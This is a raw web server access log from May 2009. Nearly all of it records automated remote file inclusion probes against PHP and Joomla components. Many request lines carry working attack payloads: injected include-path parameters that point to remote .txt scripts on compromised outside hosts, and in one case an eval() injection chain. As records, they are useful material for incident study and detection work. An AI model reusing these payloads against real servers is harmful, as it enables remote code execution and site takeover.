74.52.2.130 - - [29/May/2009:19:00:10 -0500] "GET /logs/access_log.1242086400//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://raic.kunsan.ac.kr/bbs//include/uiu.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
74.52.2.130 - - [29/May/2009:19:00:10 -0500] "GET /logs/access_log.1242086400//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://raic.kunsan.ac.kr/bbs//include/uiu.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
65.55.106.121 - - [29/May/2009:19:00:38 -0500] "GET /logs/access_log.1131580800 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
74.52.2.130 - - [29/May/2009:19:01:13 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://raic.kunsan.ac.kr/bbs//include/uiu.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
74.52.2.130 - - [29/May/2009:19:01:13 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://raic.kunsan.ac.kr/bbs//include/uiu.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
74.52.2.130 - - [29/May/2009:19:01:13 -0500] "GET /logs/access_log.1239408000//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://raic.kunsan.ac.kr/bbs//include/uiu.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
74.52.2.130 - - [29/May/2009:19:01:13 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://raic.kunsan.ac.kr/bbs//include/uiu.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
74.52.2.130 - - [29/May/2009:19:01:13 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://raic.kunsan.ac.kr/bbs//include/uiu.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
74.52.2.130 - - [29/May/2009:19:01:14 -0500] "GET /logs/access_log.1239408000//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://raic.kunsan.ac.kr/bbs//include/uiu.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
74.52.2.130 - - [29/May/2009:19:01:27 -0500] "GET /logs/access_log.1242086400//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://raic.kunsan.ac.kr/bbs//include/uiu.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
74.52.2.130 - - [29/May/2009:19:01:27 -0500] "GET /logs/access_log.1242086400//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://raic.kunsan.ac.kr/bbs//include/uiu.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
67.212.165.114 - - [29/May/2009:19:01:31 -0500] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
67.212.165.114 - - [29/May/2009:19:01:31 -0500] "GET /logs/access_log.1242432000/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 350 "-""Mozilla/5.0"
67.212.165.114 - - [29/May/2009:19:01:31 -0500] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 328 "-""Mozilla/5.0"
67.212.165.114 - - [29/May/2009:19:02:14 -0500] "GET /logs/access_log.1240963200/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 350 "-""Mozilla/5.0"
121.165.73.157 - - [29/May/2009:19:02:32 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://raic.kunsan.ac.kr/bbs//include/uiu.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
121.165.73.157 - - [29/May/2009:19:02:32 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://raic.kunsan.ac.kr/bbs//include/uiu.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
121.165.73.157 - - [29/May/2009:19:02:32 -0500] "GET /logs/access_log.1239408000//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://raic.kunsan.ac.kr/bbs//include/uiu.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
121.165.73.157 - - [29/May/2009:19:02:41 -0500] "GET /logs/access_log.1242086400//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://raic.kunsan.ac.kr/bbs//include/uiu.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
80.237.146.58 - - [29/May/2009:19:03:58 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.torgi.kz/help/idxx.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
80.237.146.58 - - [29/May/2009:19:03:58 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.torgi.kz/help/idxx.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
80.237.146.58 - - [29/May/2009:19:03:58 -0500] "GET /logs/access_log.1242172800//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.torgi.kz/help/idxx.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
80.237.146.58 - - [29/May/2009:19:04:03 -0500] "GET /logs/access_log.1242259200//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.torgi.kz/help/idxx.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
80.237.146.58 - - [29/May/2009:19:04:38 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.nw.or.kr/bbs/icon/tukulid.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
80.237.146.58 - - [29/May/2009:19:04:38 -0500] "GET /logs/access_log.1240185600//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.nw.or.kr/bbs/icon/tukulid.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
80.237.146.58 - - [29/May/2009:19:04:39 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.nw.or.kr/bbs/icon/tukulid.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
80.237.146.58 - - [29/May/2009:19:04:39 -0500] "GET /logs/access_log.1240358400//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.nw.or.kr/bbs/icon/tukulid.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
85.119.154.129 - - [29/May/2009:19:05:23 -0500] "GET /logs//errors.php?error=http://www.sitealacarte.be/cache/errors.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
85.119.154.129 - - [29/May/2009:19:05:23 -0500] "GET /logs//errors.php?error=http://www.sitealacarte.be/cache/errors.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
85.119.154.129 - - [29/May/2009:19:05:24 -0500] "GET //errors.php?error=http://www.sitealacarte.be/cache/errors.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
85.119.154.129 - - [29/May/2009:19:05:24 -0500] "GET //errors.php?error=http://www.sitealacarte.be/cache/errors.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
84.32.195.2 - - [29/May/2009:19:07:36 -0500] "GET /logs/access_log.1242172800//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.torgi.kz/help/idxx.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
213.203.223.93 - - [29/May/2009:19:08:54 -0500] "GET /logs/access_log.1239667200//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.nw.or.kr/bbs/icon/tukulid.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
213.203.223.93 - - [29/May/2009:19:08:54 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.nw.or.kr/bbs/icon/tukulid.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
213.203.223.93 - - [29/May/2009:19:08:54 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.nw.or.kr/bbs/icon/tukulid.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
213.203.223.93 - - [29/May/2009:19:09:43 -0500] "GET /logs/access_log.1240185600//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.nw.or.kr/bbs/icon/tukulid.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
67.212.165.114 - - [29/May/2009:19:14:01 -0500] "GET /modules/links/showlinks.php?language_home=&rootdp=zZz&gsLanguage=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
67.212.165.114 - - [29/May/2009:19:14:01 -0500] "GET /logs/modules/links/showlinks.php?language_home=&rootdp=zZz&gsLanguage=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 315 "-""Mozilla/5.0"
67.212.165.114 - - [29/May/2009:19:14:01 -0500] "GET /logs/access_log.1240444800/modules/links/showlinks.php?language_home=&rootdp=zZz&gsLanguage=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 337 "-""Mozilla/5.0"
67.212.165.114 - - [29/May/2009:19:14:01 -0500] "GET /logs/access_log.1238112000/modules/links/showlinks.php?language_home=&rootdp=zZz&gsLanguage=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 337 "-""Mozilla/5.0"
67.212.165.114 - - [29/May/2009:19:16:57 -0500] "GET /logs/access_log.1106006400//?sourcedir=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 311 "-""Mozilla/5.0"
67.212.165.114 - - [29/May/2009:19:16:57 -0500] "GET //?sourcedir=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
67.212.165.114 - - [29/May/2009:19:16:58 -0500] "GET /logs//?sourcedir=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 200 191354 "-""Mozilla/5.0"
67.212.165.114 - - [29/May/2009:19:17:04 -0500] "GET /logs/access_log.1168992000//?sourcedir=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 311 "-""Mozilla/5.0"
72.82.228.83 - - [29/May/2009:19:20:42 -0500] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://backs.thewomanizer.net/remember.txt??? HTTP/1.1" 404 342 "-""Mozilla/5.0"
72.82.228.83 - - [29/May/2009:19:20:45 -0500] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://backs.thewomanizer.net/remember.txt??? HTTP/1.1" 404 347 "-""Mozilla/5.0"
72.82.228.83 - - [29/May/2009:19:20:45 -0500] "GET /logs/access_log.1242259200//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://backs.thewomanizer.net/remember.txt??? HTTP/1.1" 404 369 "-""Mozilla/5.0"
72.82.228.83 - - [29/May/2009:19:21:07 -0500] "GET /logs/access_log.1241654400//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://backs.thewomanizer.net/remember.txt??? HTTP/1.1" 404 369 "-""Mozilla/5.0"
218.185.20.88 - - [29/May/2009:19:23:58 -0500] "GET /logs/access_log.1242086400//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 351 "-""Mozilla/5.0"
218.185.20.88 - - [29/May/2009:19:23:59 -0500] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 329 "-""Mozilla/5.0"
218.185.20.88 - - [29/May/2009:19:23:59 -0500] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
218.185.20.88 - - [29/May/2009:19:24:27 -0500] "GET /logs/access_log.1242432000//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 351 "-""Mozilla/5.0"
74.55.117.34 - - [29/May/2009:19:26:20 -0500] "GET /logs/board//include/footer.php?_path[counter]=http://lms3.bu.ac.th:8080/claroline/user/id.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
74.55.117.34 - - [29/May/2009:19:26:20 -0500] "GET /board//include/footer.php?_path[counter]=http://lms3.bu.ac.th:8080/claroline/user/id.txt?? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
74.55.117.34 - - [29/May/2009:19:26:21 -0500] "GET /logs/board//include/footer.php?_path[counter]=http://lms3.bu.ac.th:8080/claroline/user/id.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
74.55.117.34 - - [29/May/2009:19:26:21 -0500] "GET /board//include/footer.php?_path[counter]=http://lms3.bu.ac.th:8080/claroline/user/id.txt?? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
74.55.117.34 - - [29/May/2009:19:26:24 -0500] "GET /logs/board//include/footer.php?_path[counter]=http://lms3.bu.ac.th:8080/claroline/user/id.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
74.55.117.34 - - [29/May/2009:19:26:24 -0500] "GET /board//include/footer.php?_path[counter]=http://lms3.bu.ac.th:8080/claroline/user/id.txt?? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
65.55.106.173 - - [29/May/2009:19:28:40 -0500] "GET /logs/access_log.1145145600 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
82.146.39.200 - - [29/May/2009:19:34:45 -0500] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.ambient-arts.co.uk/modules/id.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.822"
82.146.39.200 - - [29/May/2009:19:34:45 -0500] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.ambient-arts.co.uk/modules/id.txt??? HTTP/1.1" 404 315 "-""libwww-perl/5.822"
61.38.53.248 - - [29/May/2009:19:34:55 -0500] "GET /logs/access_log.1233619200//index.php?DOCUMENT_ROOT=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
61.38.53.248 - - [29/May/2009:19:34:55 -0500] "GET /logs//index.php?DOCUMENT_ROOT=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
61.38.53.248 - - [29/May/2009:19:34:55 -0500] "GET //index.php?DOCUMENT_ROOT=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
61.38.53.248 - - [29/May/2009:19:35:35 -0500] "GET //index.php?DOCUMENT_ROOT=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
61.38.53.248 - - [29/May/2009:19:35:35 -0500] "GET /logs//index.php?DOCUMENT_ROOT=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
61.38.53.248 - - [29/May/2009:19:35:35 -0500] "GET /logs/access_log.1233619200//index.php?DOCUMENT_ROOT=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
61.38.53.248 - - [29/May/2009:19:35:52 -0500] "GET /logs/access_log.1238889600//index.php?DOCUMENT_ROOT=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
61.38.53.248 - - [29/May/2009:19:36:51 -0500] "GET /logs/access_log.1238889600//index.php?DOCUMENT_ROOT=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
218.146.255.11 - - [29/May/2009:19:39:51 -0500] "GET //index.php?DOCUMENT_ROOT=http://www.ks-bank.ru/images/baner.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
218.146.255.11 - - [29/May/2009:19:39:51 -0500] "GET /logs//index.php?DOCUMENT_ROOT=http://www.ks-bank.ru/images/baner.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
218.146.255.11 - - [29/May/2009:19:39:51 -0500] "GET /logs/access_log.1233619200//index.php?DOCUMENT_ROOT=http://www.ks-bank.ru/images/baner.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
218.146.255.11 - - [29/May/2009:19:40:50 -0500] "GET /logs/access_log.1238889600//index.php?DOCUMENT_ROOT=http://www.ks-bank.ru/images/baner.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
209.172.33.230 - - [29/May/2009:19:41:22 -0500] "GET /logs/access_log.1233619200//index.php?DOCUMENT_ROOT=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
209.172.33.230 - - [29/May/2009:19:41:22 -0500] "GET //index.php?DOCUMENT_ROOT=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
209.172.33.230 - - [29/May/2009:19:41:27 -0500] "GET /logs//index.php?DOCUMENT_ROOT=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
216.221.10.116 - - [29/May/2009:19:41:40 -0500] "GET /logs/access_log.1239408000/?binn_include_path=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 310 "-""Mozilla/5.0"
216.221.10.116 - - [29/May/2009:19:41:40 -0500] "GET /?binn_include_path=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
216.221.10.116 - - [29/May/2009:19:41:41 -0500] "GET /logs/access_log.1242518400/?binn_include_path=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 310 "-""Mozilla/5.0"
216.221.10.116 - - [29/May/2009:19:41:41 -0500] "GET /logs/?binn_include_path=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 200 191349 "-""Mozilla/5.0"
65.98.80.2 - - [29/May/2009:19:41:47 -0500] "GET /?binn_include_path=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
65.98.80.2 - - [29/May/2009:19:41:47 -0500] "GET /logs/access_log.1239408000/?binn_include_path=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 310 "-""Mozilla/5.0"
65.98.80.2 - - [29/May/2009:19:41:47 -0500] "GET /logs/access_log.1242518400/?binn_include_path=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 310 "-""Mozilla/5.0"
65.98.80.2 - - [29/May/2009:19:41:48 -0500] "GET /logs/?binn_include_path=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 200 191349 "-""Mozilla/5.0"
209.172.33.230 - - [29/May/2009:19:41:56 -0500] "GET /logs/access_log.1238889600//index.php?DOCUMENT_ROOT=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
65.98.80.2 - - [29/May/2009:19:42:06 -0500] "GET /?binn_include_path=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
65.98.80.2 - - [29/May/2009:19:42:06 -0500] "GET /logs/access_log.1239408000/?binn_include_path=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 310 "-""Mozilla/5.0"
65.98.80.2 - - [29/May/2009:19:42:07 -0500] "GET /?binn_include_path=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
65.98.80.2 - - [29/May/2009:19:42:07 -0500] "GET /logs/access_log.1239408000/?binn_include_path=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 310 "-""Mozilla/5.0"
65.98.80.2 - - [29/May/2009:19:42:07 -0500] "GET /logs/access_log.1242518400/?binn_include_path=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 310 "-""Mozilla/5.0"
65.98.80.2 - - [29/May/2009:19:42:07 -0500] "GET /logs/access_log.1242518400/?binn_include_path=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 310 "-""Mozilla/5.0"
65.98.80.2 - - [29/May/2009:19:42:07 -0500] "GET /logs/?binn_include_path=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 200 191349 "-""Mozilla/5.0"
65.98.80.2 - - [29/May/2009:19:42:07 -0500] "GET /logs/?binn_include_path=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 200 191349 "-""Mozilla/5.0"
72.82.228.83 - - [29/May/2009:19:42:39 -0500] "GET //?sIncPath=http://backs.thewomanizer.net/remember.txt??? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
72.82.228.83 - - [29/May/2009:19:42:39 -0500] "GET /logs/access_log.1239753600//?sIncPath=http://backs.thewomanizer.net/remember.txt??? HTTP/1.1" 404 311 "-""Mozilla/5.0"
72.82.228.83 - - [29/May/2009:19:42:39 -0500] "GET /logs/access_log.1233964800//?sIncPath=http://backs.thewomanizer.net/remember.txt??? HTTP/1.1" 404 311 "-""Mozilla/5.0"
72.82.228.83 - - [29/May/2009:19:42:42 -0500] "GET /logs//?sIncPath=http://backs.thewomanizer.net/remember.txt??? HTTP/1.1" 200 191354 "-""Mozilla/5.0"
68.178.205.187 - - [29/May/2009:19:42:44 -0500] "GET /logs/access_log.1239408000/?binn_include_path=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 310 "-""Mozilla/5.0"
68.178.205.187 - - [29/May/2009:19:42:44 -0500] "GET /logs/access_log.1242518400/?binn_include_path=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 310 "-""Mozilla/5.0"
68.178.205.187 - - [29/May/2009:19:42:44 -0500] "GET /?binn_include_path=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
68.178.205.187 - - [29/May/2009:19:42:44 -0500] "GET /logs/?binn_include_path=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 200 191349 "-""Mozilla/5.0"
174.37.46.66 - - [29/May/2009:19:43:10 -0500] "GET /logs/access_log.1239408000/?binn_include_path=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 310 "-""Mozilla/5.0"
174.37.46.66 - - [29/May/2009:19:43:10 -0500] "GET /logs/access_log.1242518400/?binn_include_path=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 310 "-""Mozilla/5.0"
174.37.46.66 - - [29/May/2009:19:43:10 -0500] "GET /?binn_include_path=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
174.37.46.66 - - [29/May/2009:19:43:11 -0500] "GET /logs/?binn_include_path=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 200 191349 "-""Mozilla/5.0"
72.82.228.83 - - [29/May/2009:19:50:31 -0500] "GET /logs/access_log.1240012800//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://backs.thewomanizer.net/remember.txt??? HTTP/1.1" 404 369 "-""Mozilla/5.0"
116.36.213.166 - - [29/May/2009:19:52:14 -0500] "GET /logs//index.php?DOCUMENT_ROOT=http://www.ks-bank.ru/images/baner.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
116.36.213.166 - - [29/May/2009:19:52:15 -0500] "GET //index.php?DOCUMENT_ROOT=http://www.ks-bank.ru/images/baner.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
116.36.213.166 - - [29/May/2009:19:52:15 -0500] "GET /logs/access_log.1233619200//index.php?DOCUMENT_ROOT=http://www.ks-bank.ru/images/baner.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
116.36.213.166 - - [29/May/2009:19:53:14 -0500] "GET //index.php?DOCUMENT_ROOT=http://www.ks-bank.ru/images/baner.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
116.36.213.166 - - [29/May/2009:19:53:15 -0500] "GET /logs//index.php?DOCUMENT_ROOT=http://www.ks-bank.ru/images/baner.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
116.36.213.166 - - [29/May/2009:19:53:15 -0500] "GET /logs/access_log.1233619200//index.php?DOCUMENT_ROOT=http://www.ks-bank.ru/images/baner.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
116.36.213.166 - - [29/May/2009:19:54:35 -0500] "GET /logs/access_log.1238889600//index.php?DOCUMENT_ROOT=http://www.ks-bank.ru/images/baner.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
116.36.213.166 - - [29/May/2009:19:55:08 -0500] "GET /logs/access_log.1238889600//index.php?DOCUMENT_ROOT=http://www.ks-bank.ru/images/baner.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
65.98.80.2 - - [29/May/2009:19:57:22 -0500] "GET ///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 356 "-""Mozilla/5.0"
65.98.80.2 - - [29/May/2009:19:57:40 -0500] "GET ///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 356 "-""Mozilla/5.0"
65.98.80.2 - - [29/May/2009:19:57:49 -0500] "GET /logs/access_log.1239753600///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 383 "-""Mozilla/5.0"
65.98.80.2 - - [29/May/2009:19:57:49 -0500] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 361 "-""Mozilla/5.0"
65.98.80.2 - - [29/May/2009:19:57:49 -0500] "GET /logs/access_log.1234828800///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 383 "-""Mozilla/5.0"
65.98.80.2 - - [29/May/2009:19:58:00 -0500] "GET /logs/access_log.1239753600///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 383 "-""Mozilla/5.0"
65.98.80.2 - - [29/May/2009:19:58:00 -0500] "GET /logs/access_log.1234828800///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 383 "-""Mozilla/5.0"
65.98.80.2 - - [29/May/2009:19:58:00 -0500] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 361 "-""Mozilla/5.0"
216.17.99.13 - - [29/May/2009:19:59:19 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 339 "-""Mozilla/5.0"
216.17.99.13 - - [29/May/2009:19:59:19 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 334 "-""Mozilla/5.0"
216.17.99.13 - - [29/May/2009:19:59:19 -0500] "GET /logs/access_log.1239408000//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 361 "-""Mozilla/5.0"
